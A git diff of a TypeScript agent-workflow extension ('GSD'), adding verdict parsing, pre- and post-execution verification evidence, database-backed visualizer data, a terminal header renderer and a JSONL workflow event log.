+  const fmMatch = content.match(/^---\n([\s\S]*?)\n---/);
+  if (fmMatch) {
+    const verdictMatch = fmMatch[1].match(/verdict:\s*([\w-]+)/i);
+    if (verdictMatch) {
+      let v = verdictMatch[1].toLowerCase();
+      if (v === "passed") v = "pass";
+      return v;
+    }
+    return undefined;
+  }
+
+  // Fallback: detect verdict in markdown body (LLM manual writes, #2960).
+  // Matches patterns like: **Verdict:** PASS, **Verdict:** ✅ PASS, **Verdict** needs-remediation
+  const bodyMatch = content.match(/\*\*Verdict:?\*\*\s*(?:✅\s*)?(\w[\w-]*)/i);
+  if (bodyMatch) {
+    let v = bodyMatch[1].toLowerCase();
+    if (v === "passed") v = "pass";
+    return v;
+  }
+
+  return undefined;
+}
+
+/**
+ * Returns `true` when the content's frontmatter contains a `verdict` field.
+ */
+export function hasVerdict(content: string): boolean {
+  return /verdict:\s*[\w-]+/i.test(content);
+}
+
+// ── UAT verdict schema ──────────────────────────────────────────────────
+
+/**
+ * Base verdicts that are always acceptable for UAT results.
+ */
+export const UAT_ACCEPTABLE_VERDICTS: readonly string[] = ["pass", "passed"];
+
+/**
+ * UAT types whose results may legitimately produce a `partial` verdict
+ * when all automatable checks pass but human-only checks remain.
+ */
+const PARTIAL_ELIGIBLE_UAT_TYPES: readonly UatType[] = [
+  "mixed",
+  "human-experience",
+  "live-runtime",
+];
+
+/**
+ * Check whether a verdict is acceptable for a given UAT type.
+ *
+ * `pass` / `passed` are always acceptable. `partial` is acceptable only for
+ * UAT types that include non-automatable human checks.
+ */
+export function isAcceptableUatVerdict(verdict: string, uatType: UatType | undefined): boolean {
+  if (UAT_ACCEPTABLE_VERDICTS.includes(verdict)) return true;
+  if (verdict === "partial" && uatType && (PARTIAL_ELIGIBLE_UAT_TYPES as readonly string[]).includes(uatType)) {
+    return true;
+  }
+  return false;
+}
+
+// ── Milestone validation verdict schema ─────────────────────────────────
+
+/**
+ * Valid verdicts for the `validate-milestone` tool.
+ */
+export const VALIDATION_VERDICTS = ["pass", "needs-attention", "needs-remediation"] as const;
+export type ValidationVerdict = (typeof VALIDATION_VERDICTS)[number];
+
+/**
+ * Check whether a string is a valid milestone validation verdict.
+ */
+export function isValidMilestoneVerdict(verdict: string): verdict is ValidationVerdict {
+  return (VALIDATION_VERDICTS as readonly string[]).includes(verdict);
+}
+
+// ── UAT type helper ─────────────────────────────────────────────────────
+
+/**
+ * Extract the UAT type from content, defaulting to `"artifact-driven"`.
+ *
+ * The `"artifact-driven"` fallback is the original default used throughout
+ * the codebase when a UAT file lacks an explicit `## UAT Type` section.
+ */
+export function getUatType(content: string): UatType {
+  return extractUatType(content) ?? "artifact-driven";
+}
diff --git a/src/resources/extensions/gsd/verification-evidence.ts b/src/resources/extensions/gsd/verification-evidence.ts
index e6cf431ff..3154ff36c 100644
--- a/src/resources/extensions/gsd/verification-evidence.ts
+++ b/src/resources/extensions/gsd/verification-evidence.ts
@@ -52,6 +52,32 @@ export interface BrowserEvidenceJSON {
   duration: number;
 }
 
+export interface PreExecutionCheckJSON {
+  /** Check category: package, file, tool, endpoint, schema */
+  category: "package" | "file" | "tool" | "endpoint" | "schema";
+  /** What was checked (e.g., package name, file path) */
+  target: string;
+  /** Whether the check passed */
+  passed: boolean;
+  /** Human-readable message explaining the result */
+  message: string;
+  /** Whether this failure should block execution (only meaningful when passed=false) */
+  blocking?: boolean;
+}
+
+export interface PostExecutionCheckJSON {
+  /** Check category: import, signature, pattern */
+  category: "import" | "signature" | "pattern";
+  /** What was checked (e.g., file:line, function name) */
+  target: string;
+  /** Whether the check passed */
+  passed: boolean;
+  /** Human-readable message explaining the result */
+  message: string;
+  /** Whether this failure should block completion (only meaningful when passed=false) */
+  blocking?: boolean;
+}
+
 export interface EvidenceJSON {
   schemaVersion: 1;
   taskId: string;
@@ -65,6 +91,10 @@ export interface EvidenceJSON {
   runtimeErrors?: RuntimeErrorJSON[];
   auditWarnings?: AuditWarningJSON[];
   browser?: BrowserEvidenceJSON;
+  /** Pre-execution checks run before task execution (package existence, file refs, etc.) */
+  preExecutionChecks?: PreExecutionCheckJSON[];
+  /** Post-execution checks run after task completion (import resolution, signature drift, pattern consistency) */
+  postExecutionChecks?: PostExecutionCheckJSON[];
 }
 
 /**
@@ -124,6 +154,44 @@ export function writeVerificationJSON(
   writeFileSync(filePath, JSON.stringify(evidence, null, 2) + "\n", "utf-8");
 }
 
+// ─── Pre-Execution Evidence ──────────────────────────────────────────────────
+
+export interface PreExecutionEvidenceJSON {
+  schemaVersion: 1;
+  milestoneId: string;
+  sliceId: string;
+  timestamp: number;
+  status: "pass" | "warn" | "fail";
+  durationMs: number;
+  checks: PreExecutionCheckJSON[];
+}
+
+/**
+ * Write pre-execution check results to a PRE-EXEC-VERIFY.json artifact
+ * in the slice directory.
+ */
+export function writePreExecutionEvidence(
+  result: { status: "pass" | "warn" | "fail"; checks: PreExecutionCheckJSON[]; durationMs: number },
+  sliceDir: string,
+  milestoneId: string,
+  sliceId: string,
+): void {
+  mkdirSync(sliceDir, { recursive: true });
+
+  const evidence: PreExecutionEvidenceJSON = {
+    schemaVersion: 1,
+    milestoneId,
+    sliceId,
+    timestamp: Date.now(),
+    status: result.status,
+    durationMs: result.durationMs,
+    checks: result.checks,
+  };
+
+  const filePath = join(sliceDir, `${sliceId}-PRE-EXEC-VERIFY.json`);
+  writeFileSync(filePath, JSON.stringify(evidence, null, 2) + "\n", "utf-8");
+}
+
 // ─── Markdown Evidence Table ─────────────────────────────────────────────────
 
 /**
diff --git a/src/resources/extensions/gsd/verification-gate.ts b/src/resources/extensions/gsd/verification-gate.ts
index c744aee11..220597772 100644
--- a/src/resources/extensions/gsd/verification-gate.ts
+++ b/src/resources/extensions/gsd/verification-gate.ts
@@ -8,6 +8,7 @@ import { existsSync, readFileSync } from "node:fs";
 import { join, basename } from "node:path";
 import type { AuditWarning, RuntimeError, VerificationCheck, VerificationResult } from "./types.js";
 import { DEFAULT_COMMAND_TIMEOUT_MS } from "./constants.js";
+import { rewriteCommandWithRtk } from "../shared/rtk.js";
 
 /** Maximum bytes of stdout/stderr to retain per command (10 KB). */
 const MAX_OUTPUT_BYTES = 10 * 1024;
@@ -220,8 +221,6 @@ function sanitizeCommand(cmd: string): string | null {
 }
 
 export interface RunVerificationGateOptions {
-  basePath: string;
-  unitId: string;
   cwd: string;
   preferenceCommands?: string[];
   taskPlanVerify?: string;
@@ -259,10 +258,11 @@ export function runVerificationGate(options: RunVerificationGateOptions): Verifi
 
   for (const command of commands) {
     const start = Date.now();
+    const rewrittenCommand = rewriteCommandWithRtk(command);
     // Pass the command string as an argument to the shell explicitly
     // to avoid Node.js DEP0190 (spawnSync with shell: true and no args).
     const shellBin = process.platform === "win32" ? "cmd" : "sh";
-    const shellArgs = process.platform === "win32" ? ["/c", command] : ["-c", command];
+    const shellArgs = process.platform === "win32" ? ["/c", rewrittenCommand] : ["-c", rewrittenCommand];
     const result: SpawnSyncReturns<string> = spawnSync(shellBin, shellArgs, {
       cwd: options.cwd,
       stdio: "pipe",
diff --git a/src/resources/extensions/gsd/visualizer-data.ts b/src/resources/extensions/gsd/visualizer-data.ts
index b196b7efa..203d8d90e 100644
--- a/src/resources/extensions/gsd/visualizer-data.ts
+++ b/src/resources/extensions/gsd/visualizer-data.ts
@@ -3,7 +3,9 @@
 import { existsSync, readFileSync, statSync } from 'node:fs';
 import { join } from 'node:path';
 import { deriveState } from './state.js';
-import { parseRoadmap, parsePlan, parseSummary, loadFile } from './files.js';
+import { parseSummary, loadFile } from './files.js';
+import { isDbAvailable, getMilestoneSlices, getSliceTasks } from './gsd-db.js';
+import { parseRoadmap, parsePlan } from './parsers-legacy.js';
 import { findMilestoneIds } from './milestone-ids.js';
 import { resolveMilestoneFile, resolveSliceFile, resolveGsdRootFile, gsdRoot } from './paths.js';
 import {
@@ -796,10 +798,24 @@ export async function loadVisualizerData(basePath: string): Promise<VisualizerDa
     const roadmapFile = resolveMilestoneFile(basePath, mid, 'ROADMAP');
     const roadmapContent = roadmapFile ? readFileCached(roadmapFile) : null;
 
-    if (roadmapContent) {
-      const roadmap = parseRoadmap(roadmapContent);
+    if (roadmapContent || isDbAvailable()) {
+      // Normalize slices from DB, fall back to file-based parsing when DB has no data
+      type NormSlice = { id: string; done: boolean; title: string; risk: string; depends: string[]; demo: string };
+      let normSlices: NormSlice[] | null = null;
+      if (isDbAvailable()) {
+        const dbSlices = getMilestoneSlices(mid);
+        if (dbSlices.length > 0) {
+          normSlices = dbSlices.map(s => ({ id: s.id, done: s.status === 'complete', title: s.title, risk: s.risk || 'medium', depends: s.depends, demo: s.demo }));
+        }
+      }
+      if (!normSlices && roadmapContent) {
+        // File-based fallback: parse roadmap for slice entries
+        const parsed = parseRoadmap(roadmapContent);
+        normSlices = parsed.slices.map(s => ({ id: s.id, done: s.done, title: s.title, risk: s.risk || 'medium', depends: s.depends, demo: '' }));
+      }
+      if (!normSlices) normSlices = [];
 
-      for (const s of roadmap.slices) {
+      for (const s of normSlices) {
         const isActiveSlice =
           state.activeMilestone?.id === mid &&
           state.activeSlice?.id === s.id;
@@ -807,19 +823,40 @@ export async function loadVisualizerData(basePath: string): Promise<VisualizerDa
         const tasks: VisualizerTask[] = [];
 
         if (isActiveSlice) {
-          const planFile = resolveSliceFile(basePath, mid, s.id, 'PLAN');
-          const planContent = planFile ? readFileCached(planFile) : null;
-
-          if (planContent) {
-            const plan = parsePlan(planContent);
-            for (const t of plan.tasks) {
-              tasks.push({
-                id: t.id,
-                title: t.title,
-                done: t.done,
-                active: state.activeTask?.id === t.id,
-                estimate: t.estimate || undefined,
-              });
+          // Normalize tasks from DB, fall back to file parsing when DB has no data
+          let usedDbTasks = false;
+          if (isDbAvailable()) {
+            const dbTasks = getSliceTasks(mid, s.id);
+            if (dbTasks.length > 0) {
+              usedDbTasks = true;
+              for (const t of dbTasks) {
+                tasks.push({
+                  id: t.id,
+                  title: t.title,
+                  done: t.status === 'complete' || t.status === 'done',
+                  active: state.activeTask?.id === t.id,
+                  estimate: t.estimate || undefined,
+                });
+              }
+            }
+          }
+          if (!usedDbTasks) {
+            // File-based fallback: parse slice plan for task entries
+            const slicePlanFile = resolveSliceFile(basePath, mid, s.id, 'PLAN');
+            if (slicePlanFile) {
+              const planContent = readFileCached(slicePlanFile);
+              if (planContent) {
+                const parsed = parsePlan(planContent);
+                for (const t of parsed.tasks) {
+                  tasks.push({
+                    id: t.id,
+                    title: t.title,
+                    done: t.done,
+                    active: state.activeTask?.id === t.id,
+                    estimate: t.estimate || undefined,
+                  });
+                }
+              }
             }
           }
         }
diff --git a/src/resources/extensions/gsd/visualizer-overlay.ts b/src/resources/extensions/gsd/visualizer-overlay.ts
index 196b2f8ec..32a98346d 100644
--- a/src/resources/extensions/gsd/visualizer-overlay.ts
+++ b/src/resources/extensions/gsd/visualizer-overlay.ts
@@ -14,7 +14,10 @@ import {
   renderHealthView,
   type ProgressFilter,
 } from "./visualizer-views.js";
+import { writeFileSync, mkdirSync } from "node:fs";
+import { join } from "node:path";
 import { writeExportFile } from "./export.js";
+import { gsdRoot } from "./paths.js";
 import { stripAnsi } from "../shared/mod.js";
 
 const TAB_COUNT = 10;
@@ -31,6 +34,24 @@ const TAB_LABELS = [
   "0 Export",
 ];
 
+type TabBarEntry = { label: string; width: number };
+
+function buildTabBarEntries(activeTab: number, filterText: string, capturesPendingCount?: number): TabBarEntry[] {
+  return TAB_LABELS.map((label, i) => {
+    let displayLabel = label;
+    if (i === activeTab && filterText) {
+      displayLabel += " \u2731";
+    }
+    if (i === 8 && capturesPendingCount) {
+      displayLabel += ` (${capturesPendingCount})`;
+    }
+    return {
+      label: displayLabel,
+      width: visibleWidth(displayLabel) + 2,
+    };
+  });
+}
+
 export class GSDVisualizerOverlay {
   private tui: { requestRender: () => void };
   private theme: Theme;
@@ -113,15 +134,14 @@ export class GSDVisualizerOverlay {
   }
 
   handleInput(data: string): void {
+    if (matchesKey(data, Key.escape) || matchesKey(data, Key.ctrl("c"))) {
+      this.dispose();
+      this.onClose();
+      return;
+    }
+
     // Filter mode input routing
     if (this.filterMode) {
-      if (matchesKey(data, Key.escape)) {
-        this.filterMode = false;
-        this.filterText = "";
-        this.invalidate();
-        this.tui.requestRender();
-        return;
-      }
       if (matchesKey(data, Key.enter)) {
         this.filterMode = false;
         this.invalidate();
@@ -176,8 +196,9 @@ export class GSDVisualizerOverlay {
         // Left click — check if on tab bar row
         if (mouse.y === 2) {
           let xPos = 3;
-          for (let i = 0; i < TAB_LABELS.length; i++) {
-            const tabWidth = TAB_LABELS[i].length + 2;
+          const tabs = buildTabBarEntries(this.activeTab, this.filterText, this.data?.captures?.pendingCount);
+          for (let i = 0; i < tabs.length; i++) {
+            const tabWidth = tabs[i]!.width;
             if (mouse.x >= xPos && mouse.x < xPos + tabWidth) {
               this.activeTab = i;
               this.invalidate();
@@ -191,12 +212,6 @@ export class GSDVisualizerOverlay {
       return;
     }
 
-    if (matchesKey(data, Key.escape) || matchesKey(data, Key.ctrl("c"))) {
-      this.dispose();
-      this.onClose();
-      return;
-    }
-
     if (matchesKey(data, Key.shift("tab"))) {
       this.activeTab = (this.activeTab - 1 + TAB_COUNT) % TAB_COUNT;
       this.invalidate();
@@ -350,9 +365,6 @@ export class GSDVisualizerOverlay {
       // Capture current active tab's rendered lines as snapshot
       const snapshotLines = this.renderTabContent(this.activeTab, 80);
       const timestamp = new Date().toISOString().replace(/[:.]/g, "-").slice(0, 19);
-      const { writeFileSync, mkdirSync } = require("node:fs");
-      const { join } = require("node:path");
-      const { gsdRoot } = require("./paths.js");
       const exportDir = gsdRoot(this.basePath);
       mkdirSync(exportDir, { recursive: true });
       const outPath = join(exportDir, `snapshot-${timestamp}.txt`);
@@ -442,20 +454,12 @@ export class GSDVisualizerOverlay {
     const content: string[] = [];
 
     // Tab bar
-    const tabs = TAB_LABELS.map((label, i) => {
-      let displayLabel = label;
-      // Show filter indicator on active tab with filter
-      if (i === this.activeTab && this.filterText) {
-        displayLabel += " \u2731";
-      }
-      // Show captures badge
-      if (i === 8 && this.data?.captures?.pendingCount) {
-        displayLabel += ` (${this.data.captures.pendingCount})`;
-      }
+    const tabEntries = buildTabBarEntries(this.activeTab, this.filterText, this.data?.captures?.pendingCount);
+    const tabs = tabEntries.map((entry, i) => {
       if (i === this.activeTab) {
-        return th.fg("accent", `[${displayLabel}]`);
+        return th.fg("accent", `[${entry.label}]`);
       }
-      return th.fg("dim", `[${displayLabel}]`);
+      return th.fg("dim", `[${entry.label}]`);
     });
     content.push(" " + tabs.join(" "));
     content.push("");
diff --git a/src/resources/extensions/gsd/watch/header-renderer.ts b/src/resources/extensions/gsd/watch/header-renderer.ts
new file mode 100644
index 000000000..27d84f9aa
--- /dev/null
+++ b/src/resources/extensions/gsd/watch/header-renderer.ts
@@ -0,0 +1,275 @@
+// GSD Watch — Header renderer: ASCII logo, session info, MCP status, remote questions
+// Copyright (c) 2026 Jeremy McSpadden <jeremy@fluxlabs.net>
+
+import { execFileSync } from "node:child_process";
+import { existsSync, readFileSync } from "node:fs";
+import { homedir } from "node:os";
+import { join } from "node:path";
+import { visibleWidth, truncateToWidth } from "@gsd/pi-tui";
+import { loadEffectiveGSDPreferences } from "../preferences.js";
+
+// ─── Constants ────────────────────────────────────────────────────────────────
+
+/**
+ * GSD ASCII logo — inlined here because the canonical src/logo.ts is outside
+ * the resources rootDir and cannot be imported directly.
+ */
+const GSD_LOGO: readonly string[] = [
+  '   ██████╗ ███████╗██████╗ ',
+  '  ██╔════╝ ██╔════╝██╔══██╗',
+  '  ██║  ███╗███████╗██║  ██║',
+  '  ██║   ██║╚════██║██║  ██║',
+  '  ╚██████╔╝███████║██████╔╝',
+  '   ╚═════╝ ╚══════╝╚═════╝ ',
+];
+
+/** Separator character for the horizontal divider line. */
+const SEPARATOR_CHAR = "─";
+
+/** Vertical bar between logo and info panel. */
+const PANEL_DIVIDER = "│";
+
+/** Label column width for Model/Provider/Directory/Branch rows. */
+const LABEL_COL_WIDTH = 10;
+
+// ─── Data Readers ─────────────────────────────────────────────────────────────
+
+/**
+ * Read the configured execution model from GSD preferences.
+ * Falls back through execution -> planning -> research -> first found.
+ * Returns "default" if nothing is configured.
+ */
+export function readModelFromPreferences(): string {
+  try {
+    const prefs = loadEffectiveGSDPreferences();
+    if (!prefs?.preferences.models) return "default";
+    const m = prefs.preferences.models as Record<string, unknown>;
+    // Try common phases in priority order
+    for (const phase of ["execution", "planning", "research", "discuss", "subagent"]) {
+      const val = m[phase];
+      if (typeof val === "string") return val;
+      if (val && typeof val === "object" && "model" in val) {
+        const model = (val as { model: string }).model;
+        if (typeof model === "string") return model;
+      }
+    }
+  } catch {
+    // Non-fatal
+  }
+  return "default";
+}
+
+/**
+ * Derive provider name from model ID prefix.
+ */
+export function deriveProvider(modelId: string): string {
+  if (modelId.startsWith("claude")) return "anthropic";
+  if (modelId.startsWith("gpt") || modelId.startsWith("o1") || modelId.startsWith("o3")) return "openai";
+  if (modelId.startsWith("gemini")) return "google";
+  if (modelId.startsWith("deepseek")) return "deepseek";
+  if (modelId === "default") return "anthropic";
+  return "unknown";
+}
+
+/**
+ * Shorten a directory path by replacing the home directory with ~.
+ */
+export function shortenPath(fullPath: string): string {
+  const home = homedir();
+  if (fullPath.startsWith(home)) {
+    return "~" + fullPath.slice(home.length);
+  }
+  return fullPath;
+}
+
+/**
+ * Read the current git branch name. Returns "unknown" on failure.
+ */
+export function readGitBranch(projectRoot: string): string {
+  try {
+    return execFileSync("git", ["rev-parse", "--abbrev-ref", "HEAD"], {
+      cwd: projectRoot,
+      encoding: "utf-8",
+      timeout: 2000,
+    }).trim();
+  } catch {
+    return "unknown";
+  }
+}
+
+/**
+ * Read MCP server names from .mcp.json or .gsd/mcp.json.
+ * Returns array of server name strings.
+ */
+export function readMcpServerNames(projectRoot: string): string[] {
+  const configPaths = [
+    join(projectRoot, ".mcp.json"),
+    join(projectRoot, ".gsd", "mcp.json"),
+  ];
+  const names: string[] = [];
+  const seen = new Set<string>();
+
+  for (const configPath of configPaths) {
+    try {
+      if (!existsSync(configPath)) continue;
+      const raw = readFileSync(configPath, "utf-8");
+      const data = JSON.parse(raw) as Record<string, unknown>;
+      const mcpServers = (data.mcpServers ?? data.servers) as
+        | Record<string, unknown>
+        | undefined;
+      if (!mcpServers || typeof mcpServers !== "object") continue;
+      for (const name of Object.keys(mcpServers)) {
+        if (!seen.has(name)) {
+          seen.add(name);
+          names.push(name);
+        }
+      }
+    } catch {
+      // Non-fatal
+    }
+  }
+
+  return names;
+}
+
+// ─── Header Layout ────────────────────────────────────────────────────────────
+
+export interface HeaderData {
+  model: string;
+  provider: string;
+  directory: string;
+  branch: string;
+  mcpServers: string[];
+}
+
+/**
+ * Gather all header data from filesystem and preferences.
+ */
+export function gatherHeaderData(projectRoot: string): HeaderData {
+  const model = readModelFromPreferences();
+  const provider = deriveProvider(model);
+  const directory = shortenPath(projectRoot);
+  const branch = readGitBranch(projectRoot);
+  const mcpServers = readMcpServerNames(projectRoot);
+
+  return { model, provider, directory, branch, mcpServers };
+}
+
+/**
+ * Build an info panel line: "Label     value" with proper padding.
+ * Returns empty string if value is empty.
+ */
+function formatInfoLine(label: string, value: string, availableWidth: number): string {
+  const bold = `\x1b[1m${label}\x1b[0m`;
+  const labelVis = visibleWidth(bold);
+  const padding = " ".repeat(Math.max(1, LABEL_COL_WIDTH - labelVis));
+  const maxValueWidth = Math.max(1, availableWidth - LABEL_COL_WIDTH);
+  const truncValue = truncateToWidth(value, maxValueWidth, "…");
+  return bold + padding + truncValue;
+}
+
+/**
+ * Format MCP server names as a dot-separated row with checkmarks.
+ * e.g. "Brave ✓  ·  Answers ✓  ·  Context7 ✓"
+ */
+export function formatMcpRow(servers: string[], width: number): string {
+  if (servers.length === 0) return "";
+
+  // Capitalize first letter of each server name
+  const items = servers.map(s => {
+    const cap = s.charAt(0).toUpperCase() + s.slice(1);
+    return `${cap} ✓`;
+  });
+
+  const full = items.join("  ·  ");
+  if (visibleWidth(full) <= width) return full;
+
+  // Truncate if too wide
+  return truncateToWidth(full, width, "…");
+}
+
+/**
+ * Render the full header as an array of terminal-safe strings.
+ *
+ * Layout: GSD ASCII logo on the left, info panel on the right separated by │.
+ * Below: MCP server row, remote questions row, separator line.
+ */
+export function renderHeaderLines(data: HeaderData, width: number): string[] {
+  const lines: string[] = [];
+
+  // Logo is 6 lines tall. Info panel has: title + blank + model + provider + directory + branch = 6 lines
+  const logoLines = GSD_LOGO;
+  const logoWidth = Math.max(...logoLines.map(l => visibleWidth(l)));
+
+  // Calculate available width for the info panel
+  // Layout: logo + " " + "│" + " " = logoWidth + 3
+  const dividerOverhead = 3; // " │ "
+  const infoPanelWidth = width - logoWidth - dividerOverhead;
+
+  // If terminal is too narrow for side-by-side, fall back to stacked layout
+  if (infoPanelWidth < 20) {
+    return renderStackedHeader(data, width);
+  }
+
+  // Build info panel lines (6 lines to match logo height)
+  const infoLines: string[] = [
+    `\x1b[1mGet Shit Done\x1b[0m`,
+    "",
+    formatInfoLine("Model", data.model, infoPanelWidth),
+    formatInfoLine("Provider", data.provider, infoPanelWidth),
+    formatInfoLine("Directory", data.directory, infoPanelWidth),
+    formatInfoLine("Branch", data.branch, infoPanelWidth),
+  ];
+
+  // Merge logo and info panel side by side
+  const maxLines = Math.max(logoLines.length, infoLines.length);
+  for (let i = 0; i < maxLines; i++) {
+    const logoLine = i < logoLines.length ? logoLines[i] : "";
+    const infoLine = i < infoLines.length ? infoLines[i] : "";
+
+    // Pad logo line to consistent width
+    const logoPad = " ".repeat(Math.max(0, logoWidth - visibleWidth(logoLine)));
+    lines.push(`${logoLine}${logoPad} ${PANEL_DIVIDER} ${infoLine}`);
+  }
+
+  // Blank line after logo+info block
+  lines.push("");
+
+  // MCP server row
+  const mcpRow = formatMcpRow(data.mcpServers, width);
+  if (mcpRow) {
+    lines.push(` ${mcpRow}`);
+  }
+
+  // Separator line
+  lines.push(SEPARATOR_CHAR.repeat(width));
+
+  return lines;
+}
+
+/**
+ * Fallback stacked layout for narrow terminals (< 20 cols for info panel).
+ */
+function renderStackedHeader(data: HeaderData, width: number): string[] {
+  const lines: string[] = [];
+
+  // Title
+  lines.push(`\x1b[1mGet Shit Done\x1b[0m`);
+  lines.push("");
+
+  // Info
+  lines.push(formatInfoLine("Model", data.model, width));
+  lines.push(formatInfoLine("Provider", data.provider, width));
+  lines.push(formatInfoLine("Directory", data.directory, width));
+  lines.push(formatInfoLine("Branch", data.branch, width));
+  lines.push("");
+
+  // MCP
+  const mcpRow = formatMcpRow(data.mcpServers, width);
+  if (mcpRow) lines.push(` ${mcpRow}`);
+
+  // Separator
+  lines.push(SEPARATOR_CHAR.repeat(width));
+
+  return lines;
+}
diff --git a/src/resources/extensions/gsd/workflow-events.ts b/src/resources/extensions/gsd/workflow-events.ts
new file mode 100644
index 000000000..efc239da5
--- /dev/null
+++ b/src/resources/extensions/gsd/workflow-events.ts
@@ -0,0 +1,157 @@
+import { createHash, randomUUID } from "node:crypto";
+import { appendFileSync, readFileSync, existsSync, mkdirSync } from "node:fs";
+import { join } from "node:path";
+import { atomicWriteSync } from "./atomic-write.js";
+import { logWarning } from "./workflow-logger.js";
+
+// ─── Session ID ───────────────────────────────────────────────────────────
+
+/**
+ * Engine-generated session ID — stable for the lifetime of this process.
+ * Agents can reference this to correlate all events from one run.
+ */
+const ENGINE_SESSION_ID: string = randomUUID();
+
+export function getSessionId(): string {
+  return ENGINE_SESSION_ID;
+}
+
+// ─── Event Types ─────────────────────────────────────────────────────────
+
+export interface WorkflowEvent {
+  v?: number;              // schema version — omitted in v1 (legacy), 2 for current format
+  cmd: string;             // e.g. "complete-task" (canonical: hyphens; legacy: underscores — both accepted by replay)
+  params: Record<string, unknown>;
+  ts: string;              // ISO 8601
+  hash: string;            // content hash (hex, 16 chars)
+  actor: "agent" | "system";
+  actor_name?: string;      // e.g. "executor-agent-01" — caller-provided identity
+  trigger_reason?: string;  // e.g. "plan-phase complete" — caller-provided causation
+  session_id: string;       // engine-generated UUID, stable per process lifetime
+}
+
+// ─── appendEvent ─────────────────────────────────────────────────────────
+
+/**
+ * Append one event to .gsd/event-log.jsonl.
+ * Computes a content hash from cmd+params (deterministic, independent of ts/actor/session).
+ * Creates .gsd directory if needed.
+ */
+export function appendEvent(
+  basePath: string,
+  event: Omit<WorkflowEvent, "hash" | "session_id"> & { actor_name?: string; trigger_reason?: string },
+): void {
+  const hash = createHash("sha256")
+    .update(JSON.stringify({ cmd: event.cmd, params: event.params }))
+    .digest("hex")
+    .slice(0, 16);
+
+  const fullEvent: WorkflowEvent = {
+    v: 2,
+    ...event,
+    hash,
+    session_id: ENGINE_SESSION_ID,
+  };
+  const dir = join(basePath, ".gsd");
+  mkdirSync(dir, { recursive: true });
+  appendFileSync(join(dir, "event-log.jsonl"), JSON.stringify(fullEvent) + "\n", "utf-8");
+}
+
+// ─── readEvents ──────────────────────────────────────────────────────────
+
+/**
+ * Read all events from a JSONL file.
+ * Returns empty array if file doesn't exist.
+ * Corrupted lines are skipped with stderr warning.
+ */
+export function readEvents(logPath: string): WorkflowEvent[] {
+  if (!existsSync(logPath)) {
+    return [];
+  }
+
+  const content = readFileSync(logPath, "utf-8");
+  const lines = content.split("\n").filter((l) => l.length > 0);
+  const events: WorkflowEvent[] = [];
+
+  for (const line of lines) {
+    try {
+      events.push(JSON.parse(line) as WorkflowEvent);
+    } catch {
+      logWarning("event-log", `skipping corrupted event line (${line.length} bytes)`);
+    }
+  }
+
+  return events;
+}
+
+// ─── findForkPoint ───────────────────────────────────────────────────────
+
+/**
+ * Find the index of the last common event between two logs by comparing hashes.
+ * Returns -1 if the first events differ (completely diverged).
+ * If one log is a prefix of the other, returns length of shorter - 1.
+ */
+export function findForkPoint(
+  logA: WorkflowEvent[],
+  logB: WorkflowEvent[],
+): number {
+  const minLen = Math.min(logA.length, logB.length);
+  let lastCommon = -1;
+
+  for (let i = 0; i < minLen; i++) {
+    if (logA[i]!.hash === logB[i]!.hash) {
+      lastCommon = i;
+    } else {
+      break;
+    }
+  }
+
+  return lastCommon;
+}
+
+// ─── compactMilestoneEvents ─────────────────────────────────────────────────
+
+/**
+ * Archive a milestone's events from the active log to a separate file.
+ * Active log retains only events from other milestones.
+ * Archived file is kept on disk for forensics.
+ *
+ * @param basePath - Project root (parent of .gsd/)
+ * @param milestoneId - The milestone whose events should be archived
+ * @returns { archived: number } — count of events moved to archive
+ */
+export function compactMilestoneEvents(
+  basePath: string,
+  milestoneId: string,
+): { archived: number } {
+  const logPath = join(basePath, ".gsd", "event-log.jsonl");
+  const archivePath = join(basePath, ".gsd", `event-log-${milestoneId}.jsonl.archived`);
+
+  const allEvents = readEvents(logPath);
+  const toArchive = allEvents.filter(
+    (e) => (e.params as { milestoneId?: string }).milestoneId === milestoneId,
+  );
+  const remaining = allEvents.filter(
+    (e) => (e.params as { milestoneId?: string }).milestoneId !== milestoneId,
+  );
+
+  if (toArchive.length === 0) {
+    return { archived: 0 };
+  }
+
+  // Write archived events to .jsonl.archived file (crash-safe)
+  atomicWriteSync(
+    archivePath,
+    toArchive.map((e) => JSON.stringify(e)).join("\n") + "\n",
+  );
+
+  // Truncate active log to remaining events only
+  atomicWriteSync(
+    logPath,
+    remaining.length > 0
+      ? remaining.map((e) => JSON.stringify(e)).join("\n") + "\n"
+      : "",
+  );
+
+  return { archived: toArchive.length };
+}
diff --git a/src/resources/extensions/gsd/workflow-logger.ts b/src/resources/extensions/gsd/workflow-logger.ts
new file mode 100644
index 000000000..e4d62b39b
--- /dev/null
+++ b/src/resources/extensions/gsd/workflow-logger.ts
@@ -0,0 +1,310 @@
+// GSD Extension — Workflow Logger
+// Centralized warning/error accumulator for the workflow engine pipeline.
+// Captures structured entries that the auto-loop can drain after each unit
+// to surface root causes for stuck loops, silent degradation, and blocked writes.
+// Error-severity entries are persisted to .gsd/audit-log.jsonl (sanitized) for
+// post-mortem analysis. Warnings are ephemeral (stderr + buffer only) to avoid
+// log amplification from expected-control-flow catch paths.
+//
+// Stderr policy: every logWarning/logError call writes immediately to stderr
+// for terminal visibility. This is intentional — unlike debug-logger (which is
+// opt-in and zero-overhead when disabled), workflow-logger covers operational
+// warnings/errors that should always be visible. There is no disable flag.
+//
+// Singleton safety: _buffer is module-level and shared across all calls within
+// a process. The auto-loop must call _resetLogs() (or drainAndSummarize()) at
+// the start of each unit to prevent log bleed between units running in the same
+// Node process.
+
+import { appendFileSync, readFileSync, existsSync, mkdirSync } from "node:fs";
+import { join } from "node:path";
+
+import { appendNotification } from "./notification-store.js";
+
+// ─── Types ──────────────────────────────────────────────────────────────
+
+export type LogSeverity = "warn" | "error";
+
+export type LogComponent =
+  | "engine"        // WorkflowEngine afterCommand side effects
+  | "projection"    // Projection rendering
+  | "manifest"      // Manifest write
+  | "event-log"     // Event append
+  | "intercept"     // Write intercept / tool-call blocks
+  | "migration"     // Auto-migration from markdown
+  | "state"         // deriveState fallback/degradation
+  | "tool"          // Tool handler errors
+  | "compaction"    // Event compaction
+  | "reconcile"     // Worktree reconciliation
+  | "db"            // Database operations (gsd-db)
+  | "dispatch"      // Auto-dispatch rule evaluation
+  | "recovery"      // Auto-recovery and timeout recovery
+  | "session"       // Session lock and session state I/O
+  | "prompt"        // Prompt construction and context injection
+  | "dashboard"     // Auto-dashboard rendering
+  | "timer"         // Auto-timers (idle watchdog, hard timeout)
+  | "worktree"      // Worktree lifecycle (create, sync, merge)
+  | "command"       // Slash command execution and maintenance
+  | "parallel"      // Parallel orchestrator and merge
+  | "fs"            // Safe filesystem operations
+  | "bootstrap"     // Extension bootstrap (system-context, agent-end)
